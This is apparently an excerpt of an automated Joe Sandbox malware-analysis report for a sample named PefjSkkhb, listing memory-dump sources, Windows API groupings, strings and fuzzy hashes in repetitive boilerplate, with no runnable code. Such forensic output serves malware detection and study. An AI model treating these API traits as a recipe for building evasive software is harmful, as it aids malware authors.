                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction ID: ae36bf16d33fb4679fe296d4512a2bff27bb70c936d358af77e7049fe2866bd4
                                                                      • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction Fuzzy Hash: 8231AD76608B8686DB10FF16E4801ADB3A1FB89BE4F844031EA8D83B65DF7CE595C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 1025951953-1010561917
                                                                      • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction ID: 9aee0b79a0742a8252ae66d8cc47e1f2dcf099551abeb1332dcf93f51db90884
                                                                      • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction Fuzzy Hash: 22312A32A19681CBE760EF15E544B5AB7A1FB88BA0F904235EB9843B54CF3CE845CF54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                      • String ID: %s%d
                                                                      • API String ID: 2330185562-1110647743
                                                                      • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction ID: 328894efca934470e9d467e9f76fae355c93b1904613f8809ec649269730f7bf
                                                                      • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction Fuzzy Hash: 0F218E31A08B8291EA14FF26E4442FAA361BB49BE0F844131DE9D83765DF2CF245C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                      • String ID: csm
                                                                      • API String ID: 2280078643-1018135373
                                                                      • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction ID: 86ac3e75ca9c44eae6d6d6ef32cc242a846e1a20e7a05c036fce59ba163c591c
                                                                      • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction Fuzzy Hash: 9F21503664864182E634FF1AE54416EB761F794BB4F800225DE8D43B95CF3CF886CB91
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID: 0
                                                                      • API String ID: 33631002-4108050209
                                                                      • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                      • Instruction ID: e2ceac7e5af8c62f87ea3e65cb81e9a8c2eef2d66710f0a94cc4d288fa6d0157
                                                                      • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                      • Instruction Fuzzy Hash: 0B21A332618B80CAD320DF25E48469EB7B4F388BA4F544226EB9D43B94CF3DD655CB40
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EB2DD1), ref: 00007FF7C0EEAF37
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EB2DD1), ref: 00007FF7C0EEAF4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction ID: a31be7bcb218037071a92d9374d8b1009afeb3679e4da1c2b7238ec0e02c0de3
                                                                      • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction Fuzzy Hash: 07F09861A19F0681EF19EF64E454364A3A4FB08B69FD40439C91D86364EFBCF998C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                      • Instruction ID: 0f4eb82f31a5c2e3c2adf24cb20ca6c09ad684bc1dccf411a6c2ccece218bce0
                                                                      • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                      • Instruction Fuzzy Hash: 9DE0ED25A09F0682EF15BF20E4143A863E5FB18BACFC40834C91D86364EFBCE594C390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction ID: 315324c6479ee5fbe9c4d32e1a62f413bcadd4c099f84b32db3e54d075cf9987
                                                                      • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction Fuzzy Hash: 28E0ED21A1AB0685FF15AF20E41536863A1FB48B69FD80435C91DC5350EFBCE5D5C390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction ID: 313aab391ea5ff6d6738854a1eff36500cd04c555b1f9c4108ad57b6219fa4cd
                                                                      • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction Fuzzy Hash: 0EE06D61909F0681EF05AF61E80432863E0FB08B6CFC40434C91D81350EFBCE698C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction ID: 7c98d87bc8073f3857c187d01eb857b24bf43c485cddfc394c5d4e242f74b060
                                                                      • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction Fuzzy Hash: 56E0ED65909B0281EF16AF24E414368A3E1FB08B68FC40435C92D86350EFBDE594C390
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction ID: e379af7c7aa9bbe79288f83884fa4382e5af68cffa90fa032ca838eee295b033
                                                                      • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction Fuzzy Hash: DCD15876B04B45C6EB14AF26C4906AC77B0FB88F98B414522DF4D87B58CF79E844C7A4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                      • Instruction ID: aeee1e55bc1e259c8a88a23f3ee70855eb8dd734130dc975831cfce9069870d7
                                                                      • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                      • Instruction Fuzzy Hash: E8D17B66B48B459AEB10FFA5D4801ECB3B1FB447A8B800436DE4D97BA9DF38E515C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMessageMoveRectScreenSend
                                                                      • String ID:
                                                                      • API String ID: 1249313431-0
                                                                      • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction ID: e13941f2fcf9823e0a8cb6d2872d4f85412e13014e47aed78615e06df174940b
                                                                      • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction Fuzzy Hash: D551D832A08A4189EB50EF65D4806BD7B62FB84BA8FD04136DE2D93784DF79F885C350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                      • Instruction ID: bcafc142805d36852a29de66d259cc4a69fb6da57e2206a579562a4e4ee08155
                                                                      • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                      • Instruction Fuzzy Hash: 7F51DE22B49A1185EF50FF62D8405BCA3B5BB44BA8F944131DE0D97798DF3DE942CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction ID: 08fc472495d8e0fcb42b5a703ea57b2bc65b43ef9fc80d1ab7024179f9ac7e03
                                                                      • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction Fuzzy Hash: 4841B066B5878286EB14FF12A40066DA791BB89FF4F844535DE2E977A6CF3CF0018790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                      • Instruction ID: 3c4d41da1df173cedea0ebb85928a04b35c0a3d0c9e47e5ff5b851fe6580fd21
                                                                      • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                      • Instruction Fuzzy Hash: 0241AA66B48B4681DB14FF26D49106DA760FB88FE4B889432DF5E87766DF38E480C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction ID: a13c6d84b838c506ad9878e79267ffe141fa9c18c1d68a1e3c443b6b1d21cff8
                                                                      • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction Fuzzy Hash: B7419F32A49A56C9EA10AF59D884679B3A0BF84BA4FD54135CE1DC33A1DF3CF885C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID:
                                                                      • API String ID: 3076010158-0
                                                                      • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                      • Instruction ID: 909aa92b403d2492e037f54c48d710484a816ad026584eb645c7c1586ba58a72
                                                                      • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                      • Instruction Fuzzy Hash: 71419E72B04A518AE710EF6AD4402AD77B1FB44BA8F944036CE0D97794CF38F986C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
